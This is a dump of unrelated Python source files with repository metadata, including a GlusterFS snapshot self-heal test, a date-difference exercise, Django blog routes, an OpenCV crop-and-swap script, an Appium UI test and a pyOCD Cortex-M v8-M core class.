            raise ExecutionError("Failed to setup volume %s" % self.volname)
        g.log.info("Volume %s has been setup successfully", self.volname)
    def test_snap_self_heal(self):
        """
        Steps:
        1. create a volume
        2. mount volume
        3. create snapshot of that volume
        4. Activate snapshot
        5. Clone snapshot and Mount
        6. Perform I/O
        7. Bring Down Few bricks from volume without
        affecting the volume or cluster.
        8. Perform I/O
        9. Bring back down bricks to online
        10. Validate heal is complete with areequal
        """
        # pylint: disable=too-many-statements, too-many-locals
        # Creating snapshot of the base volume
        g.log.info("Starting to Create snapshot")
        ret, _, _ = snap_create(self.mnode, self.volname, self.snap)
        self.assertEqual(ret, 0, ("Failed to create snapshot for volume %s"
                                  % self.volname))
        g.log.info("Snapshot %s created successfully for volume %s", self.snap,
                   self.volname)
        # Activating snapshot (required before it can be cloned)
        g.log.info("Starting to Activate Snapshot")
        ret, _, _ = snap_activate(self.mnode, self.snap)
        self.assertEqual(ret, 0, ("Failed to Activate snapshot %s"
                                  % self.snap))
        g.log.info("Snapshot %s activated successfully", self.snap)
        # snapshot list (sanity check that listing works)
        ret, _, _ = snap_list(self.mnode)
        self.assertEqual(ret, 0, ("Failed to list all the snapshot"))
        g.log.info("Snapshot list command was successful")
        # Creating a Clone volume from the snapshot
        g.log.info("Starting to Clone volume from Snapshot")
        ret, _, _ = snap_clone(self.mnode, self.snap, self.clone)
        self.assertEqual(ret, 0, ("Failed to clone %s from snapshot %s"
                                  % (self.clone, self.snap)))
        g.log.info("%s created successfully", self.clone)
        # Start the clone volume
        g.log.info("start to created clone volumes")
        ret, _, _ = volume_start(self.mnode, self.clone)
        self.assertEqual(ret, 0, "Failed to start clone %s" % self.clone)
        g.log.info("clone volume %s started successfully", self.clone)
        # Mounting the clone volume
        g.log.info("Mounting a clone volume")
        ret, _, _ = mount_volume(self.clone, self.mount_type, self.mount1,
                                 self.mnode, self.clients[0])
        self.assertEqual(ret, 0, "Failed to mount clone Volume %s"
                         % self.clone)
        g.log.info("Clone volume %s mounted Successfully", self.clone)
        # Checking that the cloned volume is actually mounted
        ret = is_mounted(self.clone, self.mount1, self.mnode,
                         self.clients[0], self.mount_type)
        self.assertTrue(ret, "Failed to mount clone volume on mount point: %s"
                        % self.mount1)
        g.log.info("clone Volume %s mounted on %s", self.clone, self.mount1)
        # Write files on the clone mount.
        # NOTE(review): g.run() is synchronous and returns a
        # (retcode, stdout, stderr) tuple; all_mounts_procs is filled but its
        # results are never validated -- consider g.run_async plus
        # validate_io_procs.
        g.log.info("Starting IO on all mounts...")
        g.log.info("mounts: %s", self.mount1)
        all_mounts_procs = []
        cmd = ("python %s create_files "
               "-f 10 --base-file-name file %s"
               % (self.script_upload_path, self.mount1))
        proc = g.run(self.clients[0], cmd)
        all_mounts_procs.append(proc)
        g.log.info("Successful in creating I/O on mounts")
        # get the bricks of the clone volume
        g.log.info("Fetching bricks for the volume : %s", self.clone)
        bricks_list = get_all_bricks(self.mnode, self.clone)
        g.log.info("Brick List : %s", bricks_list)
        # Select bricks to bring offline.
        # NOTE(review): bricks are *selected* from self.volname but brought
        # offline on self.clone below; clone brick paths normally differ from
        # the parent volume's -- confirm this is intended.
        g.log.info("Starting to bring bricks to offline")
        bricks_to_bring_offline_dict = (select_bricks_to_bring_offline(
            self.mnode, self.volname))
        bricks_to_bring_offline = filter(None, (
            bricks_to_bring_offline_dict['hot_tier_bricks'] +
            bricks_to_bring_offline_dict['cold_tier_bricks'] +
            bricks_to_bring_offline_dict['volume_bricks']))
        g.log.info("Brick to bring offline: %s ", bricks_to_bring_offline)
        ret = bring_bricks_offline(self.clone, bricks_to_bring_offline)
        self.assertTrue(ret, "Failed to bring the bricks offline")
        g.log.info("Successful in bringing bricks: %s offline",
                   bricks_to_bring_offline)
        # Validate the offline bricks list against what we took down
        offline_bricks = get_offline_bricks_list(self.mnode, self.clone)
        self.assertIsNotNone(offline_bricks, "Failed to get offline bricklist"
                             "for volume %s" % self.clone)
        for bricks in offline_bricks:
            self.assertIn(bricks, bricks_to_bring_offline,
                          "Failed to validate "
                          "Bricks offline")
        g.log.info("Bricks Offline: %s", offline_bricks)
        # Online bricks list (informational)
        online_bricks = get_online_bricks_list(self.mnode, self.clone)
        self.assertIsNotNone(online_bricks, "Failed to get online bricks"
                             " for volume %s" % self.clone)
        g.log.info("Bricks Online: %s", online_bricks)
        # Write files on the mount point while bricks are down
        g.log.info("Starting IO on all mounts...")
        g.log.info("mounts: %s", self.mount1)
        all_mounts_procs = []
        cmd = ("python %s create_files "
               "-f 10 --base-file-name file %s" % (self.script_upload_path,
                                                   self.mount1))
        proc = g.run(self.clients[0], cmd)
        all_mounts_procs.append(proc)
        g.log.info("Successful in creating I/O on mounts")
        # Bring the downed bricks back online
        g.log.info("bring all bricks online")
        ret = bring_bricks_online(self.mnode, self.clone,
                                  bricks_to_bring_offline)
        self.assertTrue(ret, "Failed to bring bricks online")
        g.log.info("Successful in bringing all bricks online")
        # Validate all bricks are online
        g.log.info("Validating all bricks are online")
        ret = are_bricks_online(self.mnode, self.clone, bricks_list)
        self.assertTrue(ret, "Failed to bring all the bricks online")
        g.log.info("bricks online: %s", bricks_list)
        # Wait for volume processes to be online
        g.log.info("Wait for volume processes to be online")
        ret = wait_for_volume_process_to_be_online(self.mnode, self.clone)
        self.assertTrue(ret, ("Failed to wait for volume %s processes to "
                              "be online" % self.clone))
        g.log.info("Successful in waiting for volume %s processes to be "
                   "online", self.clone)
        # Verify all of the volume's processes are online
        g.log.info("Verifying volume's all process are online")
        ret = verify_all_process_of_volume_are_online(self.mnode, self.clone)
        self.assertTrue(ret, ("Volume %s : All process are not online"
                              % self.clone))
        g.log.info("Volume %s : All process are online", self.clone)
        # Wait for the heal process to complete.
        # NOTE(review): the brick cycling above happened on self.clone, so
        # heal should presumably be monitored on the clone volume, not
        # self.volname -- confirm.
        g.log.info("waiting for heal process to complete")
        ret = monitor_heal_completion(self.mnode, self.volname)
        self.assertTrue(ret, "Failed to complete the heal process")
        g.log.info("Successfully completed heal process")
        # Check arequal checksums per subvolume: every brick of a replica set
        # must match the first brick after heal.
        g.log.info("Starting to get sub-volumes for volume %s", self.clone)
        subvols = get_subvols(self.mnode, self.clone)
        num_subvols = len(subvols['volume_subvols'])
        g.log.info("Number of subvolumes in volume %s:", num_subvols)
        # Get arequals and compare
        g.log.info("Starting to Compare areequals")
        for i in range(0, num_subvols):
            # Reference checksum from the first brick of this subvolume
            subvol_brick_list = subvols['volume_subvols'][i]
            node, brick_path = subvol_brick_list[0].split(':')
            command = ('arequal-checksum -p %s '
                       '-i .glusterfs -i .landfill -i .trashcan'
                       % brick_path)
            ret, arequal, _ = g.run(node, command)
            first_brick_total = arequal.splitlines()[-1].split(':')[-1]
            # Compare every brick in the subvolume against the reference
            for brick in subvol_brick_list:
                node, brick_path = brick.split(':')
                command = ('arequal-checksum -p %s '
                           '-i .glusterfs -i .landfill -i .trashcan'
                           % brick_path)
                ret, brick_arequal, _ = g.run(node, command)
                self.assertFalse(ret,
                                 'Failed to get arequal on brick %s'
                                 % brick)
                g.log.info('Getting arequal for %s is successful', brick)
                brick_total = brick_arequal.splitlines()[-1].split(':')[-1]
                self.assertEqual(first_brick_total, brick_total,
                                 'Arequals for subvol and %s are not equal'
                                 % brick)
                g.log.info('Arequals for subvol and %s are equal', brick)
        g.log.info('All arequals are equal for distributed-replicated')
    def tearDown(self):
        # Unmount and delete the cloned volume first
        g.log.info("Starting to umount Volume")
        ret = umount_volume(self.clients[0], self.mount1)
        if not ret:
            raise ExecutionError("Failed to unmount the cloned volume")
        g.log.info("Successfully Unmounted the cloned volume")
        g.log.info("Starting to cleanup volume")
        ret = cleanup_volume(self.mnode, self.clone)
        if not ret:
            raise ExecutionError("Failed to cleanup the cloned volume")
        g.log.info("Successful in cleanup Cloned volume")
        # Then unmount and clean up the original volume
        g.log.info("Starting to Unmount Volume and Cleanup Volume")
        ret = self.unmount_volume_and_cleanup_volume(mounts=self.mounts)
        if not ret:
            raise ExecutionError("Failed to umount the vol & cleanup Volume")
        g.log.info("Successful in umounting the volume and Cleanup")
"vavuthu@redhat.com"
] | vavuthu@redhat.com |
51f98ecf9694b803c8e5a2691359a7e9a09e42c7 | 87f265520bec8db1a9c039a0860b6b824de40192 | /chapter_1/days_since_birth_udacity_simple.py | 3ece89083ead2fc6cc8afbf6276b21843f8d0194 | [] | no_license | vladcipariu91/DSA-Problems | 78b4edf467cc6565a6b4afdcb0356a28771a6319 | edd77b49e176cc0d7426b168f0fbc7b39d9fe10e | refs/heads/master | 2020-07-25T10:58:09.416339 | 2019-12-03T11:35:42 | 2019-12-03T11:35:42 | 208,266,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,185 | py | months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def daysBetweenDates(year1, month1, day1, year2, month2, day2):
    """
    Calculates the number of days between two dates.

    The second date must not precede the first (checked with an assert).
    """
    start = (year1, month1, day1)
    end = (year2, month2, day2)
    assert not isBefore(end[0], end[1], end[2], start[0], start[1], start[2])
    elapsed = 0
    while isBefore(start[0], start[1], start[2], end[0], end[1], end[2]):
        start = nextDay(*start)
        elapsed += 1
    return elapsed
def isLeapYear(year):
    """Return True if *year* is a leap year under the Gregorian rules.

    Divisible by 4, except century years, which must be divisible by 400.
    """
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def nextDay(year, month, day):
    """Return the date of the day after (year, month, day) as a tuple.

    Handles real month lengths via daysInMonth (including leap-year
    February) and rolls over at month and year boundaries.  The previous
    docstring ("assume every month has 30 days") described an earlier
    simplified version and was wrong for this implementation.
    """
    if day < daysInMonth(year, month):
        return year, month, day + 1
    # Last day of the month: roll into the next month (or next year).
    if month == 12:
        return year + 1, 1, 1
    return year, month + 1, 1
def daysInMonth(year, month):
    """Return the number of days in *month* (1-12) of *year*, leap-aware.

    Reads the module-level ``months`` table; February gains a day in
    leap years.
    """
    # Renamed the local: the original `daysInMonth` local shadowed the
    # function's own name, which is confusing and blocks reuse/recursion.
    days = months[month - 1]
    if month == 2 and isLeapYear(year):
        days += 1
    return days
def isBefore(year1, month1, day1,
             year2, month2, day2):
    """Return True if date 1 is strictly earlier than date 2.

    Uses Python's lexicographic tuple comparison, which is exactly
    year-then-month-then-day ordering; replaces the equivalent nested
    conditional chain.
    """
    return (year1, month1, day1) < (year2, month2, day2)
def test_daysInMonth():
    """Spot-check month lengths, including a leap-year February."""
    cases = [((2000, 2), 29), ((2001, 2), 28), ((2000, 1), 31)]
    for (y, m), expected in cases:
        assert daysInMonth(y, m) == expected
def test_isLeapYear():
    """Leap (2000, 1992, 1904) and non-leap century (1900) years."""
    for leap in (2000, 1992, 1904):
        assert isLeapYear(leap)
    assert not isLeapYear(1900)
def test_nextDay():
    """Advance over a plain day, year end, month end, and leap February."""
    cases = [
        ((2018, 9, 3), (2018, 9, 4)),
        ((2018, 12, 31), (2019, 1, 1)),
        ((2018, 11, 30), (2018, 12, 1)),
        ((2000, 2, 28), (2000, 2, 29)),
        ((2000, 2, 29), (2000, 3, 1)),
    ]
    for start, expected in cases:
        assert nextDay(*start) == expected
def test_isBefore():
    """Strict ordering: earlier dates, equality, and reversed arguments."""
    before = [
        ((1991, 1, 1), (2019, 1, 1)),
        ((1991, 1, 1), (1991, 1, 2)),
        ((1991, 1, 3), (1991, 2, 1)),
    ]
    not_before = [
        ((1991, 1, 1), (1991, 1, 1)),
        ((1992, 1, 3), (1991, 2, 1)),
    ]
    for d1, d2 in before:
        assert isBefore(*(d1 + d2))
    for d1, d2 in not_before:
        assert not isBefore(*(d1 + d2))
def test_DaysBetweenDates():
    """End-to-end checks, from same-day up to multi-year spans."""
    cases = [
        ((2017, 12, 30, 2017, 12, 30), 0),    # same day
        ((2017, 12, 30, 2017, 12, 31), 1),    # adjacent days
        ((2017, 12, 30, 2018, 1, 1), 2),      # new year
        ((2012, 6, 29, 2013, 6, 29), 365),    # full year difference
        ((1991, 1, 6, 2019, 9, 2), 10466),    # multi-decade span
        ((2012, 1, 1, 2013, 1, 1), 366),      # leap year span
    ]
    for args, expected in cases:
        assert daysBetweenDates(*args) == expected
    print("Congratulations! Your daysBetweenDates")
    print("function is working correctly!")
# Run the whole self-test suite when the module is executed/imported.
test_daysInMonth()
test_isLeapYear()
test_nextDay()
test_isBefore()
test_DaysBetweenDates()
| [
"vladcipariu@gmail.com"
] | vladcipariu@gmail.com |
8b6a6763701c9c14489d228ec1dc94576dead621 | 7aca3c9447a56169dbc4cc5c547db2fee5b14dc6 | /sorted.py | 255791790dd2adc12bea7946ff5ce5cebcb2f5f0 | [] | no_license | oksanatsuverkalova/PythonProjects | b211afb887e4202b78d977b4964e74dce95ba117 | d5e552449dfa19471f136c214c84a7a08e9a4d69 | refs/heads/main | 2023-07-11T18:58:28.954678 | 2021-06-16T20:19:11 | 2021-06-16T20:19:11 | 331,691,241 | 0 | 1 | null | 2021-08-29T16:54:45 | 2021-01-21T16:46:31 | Python | UTF-8 | Python | false | false | 119 | py | numbers = [345, 465, 43, 1, 12, 214, 67, 4213, 2, 34, 77]
# Print a new list with the numbers in ascending order (sorted() does not mutate).
print(sorted(numbers))
print(sorted(numbers, reverse=True)) | [
"noreply@github.com"
] | oksanatsuverkalova.noreply@github.com |
75b317be1d1147754f7a1ef628a29805477c59a2 | a3b9ce8aa33c7ab62e7754edd11c63f84071ab68 | /blog/urls.py | 0728b5ae04ee9a2ea230944a08ba171e94a39eb3 | [] | no_license | dillipsingh99/simpleisbetter | b69bd48ef4e972832e30022bfdcc9138d2c05273 | daa08df121e7f77d5fae5ff2a8ec54d66dc5e7fe | refs/heads/master | 2023-08-14T00:20:50.098773 | 2021-10-09T13:16:11 | 2021-10-09T13:16:11 | 415,249,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | from django.urls import path
from .views import (
blog_home,
blog_detail,
BlogCreateView,
BlogUpdateView,
BlogDeleteView,
)
# Blog app routes: index, detail, and the create/update/delete class-based views.
urlpatterns = [
    path('', blog_home, name='blog_home'),  # blog index
    path('<int:pk>/', blog_detail, name='blog_detail'),  # single post by primary key
    path('create/', BlogCreateView.as_view(), name='blog_create'),  # new post
    path('<int:pk>/update/', BlogUpdateView.as_view(), name='blog_update'),  # edit post
    path('<int:pk>/delete/', BlogDeleteView.as_view(), name='blog_delete'),  # remove post
] | [
"dk381759@gmail.com"
] | dk381759@gmail.com |
305f691a749f474d814151a9c76c20b19583e32a | 1892e82be0786c806b26feeefff5d8f646794a8d | /app/seeds/bookings.py | 6329f41315e0ca372a0151ab6d0ccef7fca5119a | [] | no_license | akuemperSFDC/staybnb | a498af72af7c6821893bd702a5dc7094b17ce2e1 | d400892b939fba42111ded44671072b40234b6ae | refs/heads/main | 2023-07-24T16:47:20.423041 | 2021-09-03T19:19:11 | 2021-09-03T19:19:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from app.models import db, Booking
import datetime
def seed_bookings():
    """Insert four demo bookings and commit them in one transaction."""
    booking1 = Booking(listing_id=1, user_id=1, number_of_guests=1, start_date=datetime.datetime(2021, 8, 2).isoformat(), end_date=datetime.datetime(2021, 8, 6).isoformat())
    booking2 = Booking(listing_id=2, user_id=1, number_of_guests=2, start_date=datetime.datetime(2021, 8, 7).isoformat(), end_date=datetime.datetime(2021, 8, 12).isoformat())
    booking3 = Booking(listing_id=3, user_id=4, number_of_guests=3, start_date='2021-08-12', end_date='2021-08-18')
    booking4 = Booking(listing_id=1, user_id=5, number_of_guests=4, start_date='2021-08-20', end_date='2021-08-21')
    for booking in (booking1, booking2, booking3, booking4):
        db.session.add(booking)
    db.session.commit()
def undo_bookings():
    """Delete all seeded bookings and reset the bookings id sequence."""
    db.session.execute('TRUNCATE bookings RESTART IDENTITY CASCADE;')
    db.session.commit()
| [
"78562233+AKuemper@users.noreply.github.com"
] | 78562233+AKuemper@users.noreply.github.com |
4358c2ac0fce94cc9e60ee2222342c74169e8fed | b6f85dbed341fc33eba142e878096217a70b141f | /src/sce/model/factory_allow_labels.py | f302855667cf953e0757e00b9125ebe2edb14999 | [] | no_license | genimarca/senti_cross_embeddings | 8a08c5854ebcfa63b566a7f6538e65a64fe73e1b | 435467b5362c301ec2e9b6a015aadcfd0ee3f797 | refs/heads/master | 2020-03-22T23:50:30.193464 | 2019-07-26T12:27:46 | 2019-07-26T12:27:46 | 140,831,055 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | #!/usr/bin/python3
# *-* coding:utf-8 *-*
'''
Created on 20 jul. 2018
@author: Eugenio Martínez Cámara
'''
from sce.model.allow_labels_names import AllowLabelsNames
class FactoryAllowLabels:
    '''
    Factory that instantiates the allow-labels handler registered under a
    given AllowLabelsNames key.
    '''

    @classmethod
    def creator(cls, allow_labels_name_key):
        '''Instantiate the allow-labels class mapped to *allow_labels_name_key*.

        :param allow_labels_name_key: name of an AllowLabelsNames enum member.
        :return: a new instance of the mapped class, or None for unknown keys.
        '''
        cl = None
        # Membership test on __members__ directly; .keys() was redundant.
        if allow_labels_name_key in AllowLabelsNames.__members__:
            # The enum value holds the dotted path "package.module.ClassName".
            allow_labels_class_path = AllowLabelsNames.__members__[allow_labels_name_key].value
            module_name, class_name = allow_labels_class_path.rsplit(".", 1)
            # fromlist takes a sequence of names; passing a list is the
            # documented form (a plain string happened to work by accident).
            module = __import__(module_name, fromlist=[class_name])
            cl = getattr(module, class_name)()
        return cl
| [
"genimarca@gmail.com"
] | genimarca@gmail.com |
35034f6869f1b6b1f67c3c7e44d3ecd2dc7d11bb | ade88dc242e2e32a2a44d593f454657da4612dd8 | /CropAndSwap.py | 17ecf7942c62a6c736f9bff793085df9eed92bac | [] | no_license | sudeeproxx/Summer_Task4 | e879f9e9050e49bfb0b9eb4ab21ff4b20dd27db6 | fd7ed0c623e2c7e0715a6cc99fafc34effe023a1 | refs/heads/main | 2023-05-26T23:09:04.605622 | 2021-06-10T08:01:52 | 2021-06-10T08:01:52 | 375,614,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | import cv2
import numpy
# Load the first image and take an 81x81-pixel patch from it.
image_1=cv2.imread("image1.jpg")
image_1.shape
crop1= image_1[48:129,102:183]
# Load the second image and take an 81x81-pixel patch from it.
image_2=cv2.imread("image2.jpg")
image_2.shape
crop2= image_2[51:132,97:178]
# NOTE(review): these are aliases, not copies - writing through swap1/swap2
# mutates image_1/image_2 (and crop1/crop2 are views of the same buffers).
swap1=image_1
swap2=image_2
#Now swap the cropped parts
#swap1[48:129,102:183]= crop2
#cv2.imshow("AfterSwap1",swap1)
#cv2.waitKey()
#cv2.destroyAllWindows()
# Paste image_1's patch into image_2 and display until a key is pressed.
swap2[51:132,97:178]= crop1
cv2.imshow("AfterSwap2",swap2)
cv2.waitKey()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | sudeeproxx.noreply@github.com |
a67b54086452c10f1e12e07bfbdab64f99c5c8ee | 7eab0c659bb033dd8e44764884c905df5c1c7962 | /case/setjymima.py | 41186c06ef52eb1d68fe4b1293834fca138d03ae | [] | no_license | pengqiuli/app-python | 63fd210f2dae04163d51b41ff0a21abde13d4cde | af9f64a80368f79c0292f69a1cdcfba4f5fbb8df | refs/heads/master | 2023-02-19T01:45:43.201350 | 2021-01-20T07:18:06 | 2021-01-20T07:18:06 | 324,941,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | # -*-coding:utf-8-*-
from base.activity import *
from time import sleep
import unittest
class test(unittest.TestCase):
    """Appium UI tests for the "set transaction password" screen."""

    @classmethod
    def setUpClass(cls):
        # Launch the app
        cls.driver = desired_caps()
        sleep(4)
        cls.driver = jinrushouye(cls.driver)
        cls.driver = mainpage(cls.driver)
        log = login(cls.driver,"plm123","plm123")
        sleep(6)
        # Open the "transaction password / set" entry.
        el = cls.driver.find_element_by_accessibility_id("交易密码\n设置").click()

    # BUG FIX: unittest invokes tearDownClass on the class object, so it must
    # be a classmethod; without the decorator the call raises a TypeError.
    @classmethod
    def tearDownClass(cls):
        pass

    def test_setjymima_001(self):
        # Transaction password left empty
        mima = setjymima(self.driver,"","123456")
        sleep(1)
        self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_01.png')
        el2 = self.driver.find_element_by_xpath(
            "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.view.View/android.view.View/android.view.View/android.view.View/android.view.View[2]/android.view.View/android.view.View[1]/android.widget.EditText[2]/android.view.View[2]")
        el2.click()

    def test_setjymima_002(self):
        # Confirmation password left empty
        mima = setjymima(self.driver,"123456","")
        sleep(1)
        self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_02.png')
        el1 = self.driver.find_element_by_xpath(
            "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.view.View/android.view.View/android.view.View/android.view.View/android.view.View[2]/android.view.View/android.view.View[1]/android.widget.EditText[1]/android.view.View[2]")
        el1.click()

    def test_setjymima_003(self):
        # The two passwords do not match
        mima = setjymima(self.driver,"321654","123456")
        sleep(1)
        self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_03.png')
        clear = setjymima_clear(self.driver)

    def test_setjymima_004(self):
        # Password is only 5 digits long
        mima = setjymima(self.driver,"32165","32165")
        sleep(1)
        self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_04.png')
        clear1 = setjymima_clear(self.driver)

    # def test_setjymima_005(self):
    #     # Password meets the rules (happy path)
    #     mima = setjymima(self.driver,"321654","321654")
    #     sleep(1)
    #     self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_05.png')
    #     clear2 = setjymima_clear(self.driver)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| [
"1151853956@qq.com"
] | 1151853956@qq.com |
f8f7e6aff74349c59cce9401e12149fb28ed8f8b | 208bc8b87cb20fc6e57c8c8846cbe947b2eec1f3 | /pyocd/coresight/cortex_m_v8m.py | ca01e71819f240e6e35497dc4209539e8afd50ac | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | canerbulduk/pyOCD | 28c545f25ef9b2949a1cd49c00faeeda986a26fe | a61e8b8dc2050309510d9fe7ca63680aafe06749 | refs/heads/main | 2023-08-24T21:10:52.427697 | 2021-11-09T15:13:48 | 2021-11-09T15:13:48 | 426,275,463 | 0 | 0 | Apache-2.0 | 2021-11-09T15:08:22 | 2021-11-09T15:08:21 | null | UTF-8 | Python | false | false | 7,538 | py | # pyOCD debugger
# Copyright (c) 2019-2020 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .cortex_m import CortexM
from .core_ids import (CORE_TYPE_NAME, CoreArchitecture, CortexMExtension)
from ..core.target import Target
from .cortex_m_core_registers import CoreRegisterGroups
LOG = logging.getLogger(__name__)
class CortexM_v8M(CortexM):
    """! @brief Component class for a v8.x-M architecture Cortex-M core."""

    # CPUID.ARCHITECTURE values distinguishing the v8-M Baseline and
    # Mainline profiles.
    ARMv8M_BASE = 0xC
    ARMv8M_MAIN = 0xF

    ## DFSR.PMU added in v8.1-M.
    DFSR_PMU = (1 << 5)

    # Debug Security Control and Status Register address and bit fields.
    DSCSR = 0xE000EE08
    DSCSR_CDSKEY = 0x00020000
    DSCSR_CDS = 0x00010000
    DSCSR_SBRSEL = 0x00000002
    DSCSR_SBRSELEN = 0x00000001

    # Processor Feature Register 1
    PFR1 = 0xE000ED44
    PFR1_SECURITY_MASK = 0x000000f0
    PFR1_SECURITY_SHIFT = 4

    PFR1_SECURITY_EXT_V8_0 = 0x1 # Base security extension.
    PFR1_SECURITY_EXT_V8_1 = 0x3 # v8.1-M adds several instructions.

    # Media and FP Feature Register 1
    MVFR1 = 0xE000EF44
    MVFR1_MVE_MASK = 0x00000f00
    MVFR1_MVE_SHIFT = 8

    MVFR1_MVE__INTEGER = 0x1
    MVFR1_MVE__FLOAT = 0x2

    def __init__(self, rootTarget, ap, memory_map=None, core_num=0, cmpid=None, address=None):
        """! @brief Constructor. Defers to CortexM, then disables VECTRESET support."""
        super(CortexM_v8M, self).__init__(rootTarget, ap, memory_map, core_num, cmpid, address)

        # Only v7-M supports VECTRESET.
        self._supports_vectreset = False

    @property
    def supported_security_states(self):
        """! @brief Tuple of security states supported by the processor.

        @return Tuple of @ref pyocd.core.target.Target.SecurityState "Target.SecurityState". The
            result depends on whether the Security extension is enabled.
        """
        if self.has_security_extension:
            return (Target.SecurityState.NONSECURE, Target.SecurityState.SECURE)
        else:
            return (Target.SecurityState.NONSECURE,)

    def _read_core_type(self):
        """! @brief Read the CPUID register and determine core type and architecture."""
        # Read CPUID register
        cpuid = self.read32(CortexM.CPUID)

        implementer = (cpuid & CortexM.CPUID_IMPLEMENTER_MASK) >> CortexM.CPUID_IMPLEMENTER_POS
        if implementer != CortexM.CPUID_IMPLEMENTER_ARM:
            LOG.warning("CPU implementer is not ARM!")

        arch = (cpuid & CortexM.CPUID_ARCHITECTURE_MASK) >> CortexM.CPUID_ARCHITECTURE_POS
        self.core_type = (cpuid & CortexM.CPUID_PARTNO_MASK) >> CortexM.CPUID_PARTNO_POS
        self.cpu_revision = (cpuid & CortexM.CPUID_VARIANT_MASK) >> CortexM.CPUID_VARIANT_POS
        self.cpu_patch = (cpuid & CortexM.CPUID_REVISION_MASK) >> CortexM.CPUID_REVISION_POS

        # Check PFR1 for the Security extension and (v8.1-M) its revision.
        pfr1 = self.read32(self.PFR1)
        pfr1_sec = ((pfr1 & self.PFR1_SECURITY_MASK) >> self.PFR1_SECURITY_SHIFT)
        self.has_security_extension = pfr1_sec in (self.PFR1_SECURITY_EXT_V8_0, self.PFR1_SECURITY_EXT_V8_1)
        if self.has_security_extension:
            self._extensions.append(CortexMExtension.SEC)
            if pfr1_sec == self.PFR1_SECURITY_EXT_V8_1:
                self._extensions.append(CortexMExtension.SEC_V81)

        if arch == self.ARMv8M_BASE:
            self._architecture = CoreArchitecture.ARMv8M_BASE
        else:
            self._architecture = CoreArchitecture.ARMv8M_MAIN

        if self.core_type in CORE_TYPE_NAME:
            if self.has_security_extension:
                LOG.info("CPU core #%d is %s r%dp%d (security ext present)", self.core_number, CORE_TYPE_NAME[self.core_type], self.cpu_revision, self.cpu_patch)
            else:
                LOG.info("CPU core #%d is %s r%dp%d", self.core_number, CORE_TYPE_NAME[self.core_type], self.cpu_revision, self.cpu_patch)
        else:
            LOG.warning("CPU core #%d type is unrecognized", self.core_number)

    def _check_for_fpu(self):
        """! @brief Determine if a core has an FPU.

        In addition to the tests performed by CortexM, this method tests for the MVE extension.
        """
        super(CortexM_v8M, self)._check_for_fpu()

        # Check for MVE.
        mvfr1 = self.read32(self.MVFR1)
        mve = (mvfr1 & self.MVFR1_MVE_MASK) >> self.MVFR1_MVE_SHIFT
        if mve == self.MVFR1_MVE__INTEGER:
            self._extensions.append(CortexMExtension.MVE)
        elif mve == self.MVFR1_MVE__FLOAT:
            # Floating-point MVE implies integer MVE as well.
            self._extensions += [CortexMExtension.MVE, CortexMExtension.MVE_FP]

    def _build_registers(self):
        """! @brief Register the core register groups available on this core's feature set."""
        super(CortexM_v8M, self)._build_registers()

        # Registers available with Security extension, either Baseline or Mainline.
        if self.has_security_extension:
            self._core_registers.add_group(CoreRegisterGroups.V8M_SEC_ONLY)

        # Mainline-only registers.
        if self.architecture == CoreArchitecture.ARMv8M_MAIN:
            self._core_registers.add_group(CoreRegisterGroups.V7M_v8M_ML_ONLY)

            # Registers available when both Mainline and Security extensions are implemented.
            if self.has_security_extension:
                self._core_registers.add_group(CoreRegisterGroups.V8M_ML_SEC_ONLY)

        # MVE registers.
        if CortexMExtension.MVE in self.extensions:
            self._core_registers.add_group(CoreRegisterGroups.V81M_MVE_ONLY)

    def get_security_state(self):
        """! @brief Returns the current security state of the processor.

        Reads DSCSR and reports Secure when the CDS (current domain secure)
        bit is set.

        @return @ref pyocd.core.target.Target.SecurityState "Target.SecurityState" enumerator.
        """
        dscsr = self.read32(self.DSCSR)
        if (dscsr & self.DSCSR_CDS) != 0:
            return Target.SecurityState.SECURE
        else:
            return Target.SecurityState.NONSECURE

    def clear_debug_cause_bits(self):
        """! @brief Clear all sticky debug-event cause bits in DFSR, including v8.1-M's PMU bit."""
        self.write32(CortexM.DFSR,
                     self.DFSR_PMU
                     | CortexM.DFSR_EXTERNAL
                     | CortexM.DFSR_VCATCH
                     | CortexM.DFSR_DWTTRAP
                     | CortexM.DFSR_BKPT
                     | CortexM.DFSR_HALTED)

    def get_halt_reason(self):
        """! @brief Returns the reason the core has halted.

        This overridden version of this method adds support for v8.x-M halt reasons.

        @return @ref pyocd.core.target.Target.HaltReason "Target.HaltReason" enumerator or None.
        """
        # DFSR may have several bits set; the first matching test below
        # determines the reported reason.
        dfsr = self.read32(self.DFSR)
        if dfsr & self.DFSR_HALTED:
            reason = Target.HaltReason.DEBUG
        elif dfsr & self.DFSR_BKPT:
            reason = Target.HaltReason.BREAKPOINT
        elif dfsr & self.DFSR_DWTTRAP:
            reason = Target.HaltReason.WATCHPOINT
        elif dfsr & self.DFSR_VCATCH:
            reason = Target.HaltReason.VECTOR_CATCH
